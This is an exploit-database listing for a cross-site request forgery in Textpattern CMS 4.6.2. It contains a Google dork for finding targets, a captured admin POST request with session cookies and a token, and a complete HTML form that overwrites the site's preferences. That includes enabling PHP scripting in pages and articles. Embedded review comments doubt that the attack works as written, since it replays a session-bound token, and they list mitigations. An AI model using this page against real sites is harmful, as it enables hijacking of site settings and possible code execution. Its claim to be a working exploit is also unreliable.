## https://sploitus.com/exploit?id=PACKETSTORM:159620
# Exploit Title: Textpattern CMS 4.6.2 - Cross-site Request Forgery  
# Exploit Author: Alperen Ergel  
# Contact: @alpren_ae  
# Software Homepage: https://textpattern.com/  
# Version: 4.6.2  
# Tested on: Windows 10 / XAMPP  
# Category: WebApp  
# Google Dork: intext:"Published with Textpattern CMS"  
# Date: 2020-10-29  
######## Description ########  
#  
# 1-) Log in to the administrator page  
#   
# 2-) Go to Admin > Prefs > Site  
#  
# 3-) All inputs are submitted without an effective CSRF check  
#  
#  
######## Proof of Concept ########  
  
========>>> REQUEST <<<=========  
  
POST /textpattern/textpattern/index.php?event=prefs HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/textpattern/textpattern/index.php  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 1806  
Connection: close  
Cookie: txp_login=localhost%2Ca170e235c4f2f59bb1300272c470807d; txp_login_public=a834cbdc8blocalhost; __atuvc=1%7C40  
Upgrade-Insecure-Requests: 1  
  
Submit=Save&sitename=victim+site&siteurl=victimurl.com&site_slogan=victimslogan&production_status=testing&timezone_key=Europe%2FBerlin&auto_dst=0&  
is_dst=0&dateformat=since&archive_dateformat=%25b+%25Oe%2C+%25I%3A%25M+%25p&permlink_mode=section_id_title&doctype=html5&logging=none&expire_logs_after=7&  
use_comments=1&img_dir=images&skin_dir=themes&file_base_path=%2Fvar%2Fwww%2Fvhosts%2Flocalhost%2Fhttpdocs%2Ftextpattern%2Ffiles&  
file_max_upload_size=2000000&tempdir=%2Fvar%2Fwww%2Fvhosts%2Flocalhost%2Fhttpdocs%2Ftextpattern%2Ftextpattern%2Ftmp&plugin_cache_dir=&  
smtp_from=&publisher_email=&override_emailcharset=0&enable_xmlrpc_server=0&default_event=article&theme_name=hive&module_pophelp=1&default_publish_status=4&  
title_no_widow=0&articles_use_excerpts=1&allow_form_override=1&attach_titles_to_permalinks=1&permlink_format=1&send_lastmod=1&publish_expired_articles=0&use_textile=1&enable_short_tags=1&  
use_plugins=1&admin_side_plugins=1&allow_page_php_scripting=1&allow_article_php_scripting=1&max_url_len=1000&syndicate_body_or_excerpt=1&rss_how_many=5&show_comment_count_in_feed=1&  
include_email_atom=0&use_mail_on_feeds_id=0&comments_on_default=0&comments_default_invite=Comment&comments_moderate=1&comments_disabled_after=42&comments_auto_append=0&  
comments_mode=0&comments_dateformat=%25b+%25Oe%2C+%25I%3A%25M+%25p&comments_sendmail=0&comments_are_ol=1&comment_means_site_updated=1&  
comments_require_name=1&comments_require_email=1&never_display_email=1&comment_nofollow=1&comments_disallow_images=0&comments_use_fat_textile=0&spam_blacklists=&  
custom_1_set=custom1&custom_2_set=custom2&custom_3_set=&custom_4_set=&custom_5_set=&custom_6_set=&custom_7_set=&custom_8_set=&custom_9_set=&custom_10_set=&  
step=prefs_save&event=prefs&_txp_token=0342db47efb6882b488f6d367067d720  
  
  
### EXPLOIT ####  
  
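<!doctype html>
<html lang="en">
<!--
  CSRF PoC for the Textpattern 4.6.2 "Prefs > Site" form (event=prefs, step=prefs_save).

  Review notes:
  * The form replays the author's own session-bound _txp_token (hidden field near the
    bottom, same value as in the captured request). A token that the server validates
    against the victim's session cannot be known to a third party, so this page as written
    only demonstrates a cross-origin POST if prefs_save does NOT check that token; the
    advisory does not show that it is unchecked. Confirm that before treating this as a
    working CSRF rather than a replay of the author's own request.
  * Every preference is resubmitted, not only the three CHANGEHERE fields. The
    file_base_path and tempdir values below differ from the captured request
    (".demo.localhost." vs "localhost"), so a successful submit would also rewrite the
    target's file and temp directories. allow_page_php_scripting and
    allow_article_php_scripting are submitted as 1 (PHP in pages/articles enabled); if the
    target had them off, a successful submit turns them on, which is the highest-impact
    change on this form and the first setting a defender should re-check after an incident.
  * Application-side mitigation is the standard one: validate a per-session CSRF token on
    every state-changing POST and reject cross-origin submissions (SameSite session
    cookies, Origin/Referer checks).
-->
<head>
  <meta charset="utf-8">
  <title>Textpattern 4.6.2 prefs_save CSRF PoC</title>
</head>
<body>
  <form action="https://localhost/textpattern/textpattern/index.php" method="POST">
    <!-- Site identity: the only values the author intends to change (placeholders kept). -->
    <input type="hidden" name="Submit" value="Save">
    <input type="hidden" name="sitename" value="CHANGEHERE">
    <input type="hidden" name="siteurl" value="CHANGEHERE">
    <input type="hidden" name="site_slogan" value="CHANGEHERE">
    <!-- Everything below is the remainder of the prefs form copied from the captured request;
         each of these is overwritten on the target as well. -->
    <input type="hidden" name="production_status" value="testing">
    <input type="hidden" name="timezone_key" value="Europe/Berlin">
    <input type="hidden" name="auto_dst" value="0">
    <input type="hidden" name="is_dst" value="0">
    <input type="hidden" name="dateformat" value="since">
    <input type="hidden" name="archive_dateformat" value="%b %Oe, %I:%M %p">
    <input type="hidden" name="permlink_mode" value="section_id_title">
    <input type="hidden" name="doctype" value="html5">
    <input type="hidden" name="logging" value="none">
    <input type="hidden" name="expire_logs_after" value="7">
    <input type="hidden" name="use_comments" value="1">
    <input type="hidden" name="img_dir" value="images">
    <input type="hidden" name="skin_dir" value="themes">
    <!-- Filesystem paths: these do not match the captured request and would break file
         handling on a target whose install lives elsewhere. -->
    <input type="hidden" name="file_base_path" value="/var/www/vhosts/.demo.localhost./httpdocs/textpattern/files">
    <input type="hidden" name="file_max_upload_size" value="2000000">
    <input type="hidden" name="tempdir" value="/var/www/vhosts/.demo.localhost./httpdocs/textpattern/textpattern/tmp">
    <input type="hidden" name="plugin_cache_dir" value="">
    <input type="hidden" name="smtp_from" value="">
    <input type="hidden" name="publisher_email" value="">
    <input type="hidden" name="override_emailcharset" value="0">
    <input type="hidden" name="enable_xmlrpc_server" value="0">
    <input type="hidden" name="default_event" value="article">
    <input type="hidden" name="theme_name" value="hive">
    <input type="hidden" name="module_pophelp" value="1">
    <input type="hidden" name="default_publish_status" value="4">
    <input type="hidden" name="title_no_widow" value="0">
    <input type="hidden" name="articles_use_excerpts" value="1">
    <input type="hidden" name="allow_form_override" value="1">
    <input type="hidden" name="attach_titles_to_permalinks" value="1">
    <input type="hidden" name="permlink_format" value="1">
    <input type="hidden" name="send_lastmod" value="1">
    <input type="hidden" name="publish_expired_articles" value="0">
    <input type="hidden" name="use_textile" value="1">
    <input type="hidden" name="enable_short_tags" value="1">
    <input type="hidden" name="use_plugins" value="1">
    <input type="hidden" name="admin_side_plugins" value="1">
    <!-- Security-relevant: both PHP-scripting switches are submitted enabled. -->
    <input type="hidden" name="allow_page_php_scripting" value="1">
    <input type="hidden" name="allow_article_php_scripting" value="1">
    <input type="hidden" name="max_url_len" value="1000">
    <input type="hidden" name="syndicate_body_or_excerpt" value="1">
    <input type="hidden" name="rss_how_many" value="5">
    <input type="hidden" name="show_comment_count_in_feed" value="1">
    <input type="hidden" name="include_email_atom" value="0">
    <input type="hidden" name="use_mail_on_feeds_id" value="0">
    <input type="hidden" name="comments_on_default" value="0">
    <input type="hidden" name="comments_default_invite" value="Comment">
    <input type="hidden" name="comments_moderate" value="1">
    <input type="hidden" name="comments_disabled_after" value="42">
    <input type="hidden" name="comments_auto_append" value="0">
    <input type="hidden" name="comments_mode" value="0">
    <input type="hidden" name="comments_dateformat" value="%b %Oe, %I:%M %p">
    <input type="hidden" name="comments_sendmail" value="0">
    <input type="hidden" name="comments_are_ol" value="1">
    <input type="hidden" name="comment_means_site_updated" value="1">
    <input type="hidden" name="comments_require_name" value="1">
    <input type="hidden" name="comments_require_email" value="1">
    <input type="hidden" name="never_display_email" value="1">
    <input type="hidden" name="comment_nofollow" value="1">
    <input type="hidden" name="comments_disallow_images" value="0">
    <input type="hidden" name="comments_use_fat_textile" value="0">
    <input type="hidden" name="spam_blacklists" value="">
    <input type="hidden" name="custom_1_set" value="custom1">
    <input type="hidden" name="custom_2_set" value="custom2">
    <input type="hidden" name="custom_3_set" value="">
    <input type="hidden" name="custom_4_set" value="">
    <input type="hidden" name="custom_5_set" value="">
    <input type="hidden" name="custom_6_set" value="">
    <input type="hidden" name="custom_7_set" value="">
    <input type="hidden" name="custom_8_set" value="">
    <input type="hidden" name="custom_9_set" value="">
    <input type="hidden" name="custom_10_set" value="">
    <input type="hidden" name="step" value="prefs_save">
    <input type="hidden" name="event" value="prefs">
    <!-- Session-bound CSRF token copied from the author's own capture; see the note at the
         top of this file. If the server validates it, this submission is rejected for any
         other session. -->
    <input type="hidden" name="_txp_token" value="0342db47efb6882b488f6d367067d720">
    <button type="submit">Do Action</button>
  </form>
</body>
</html>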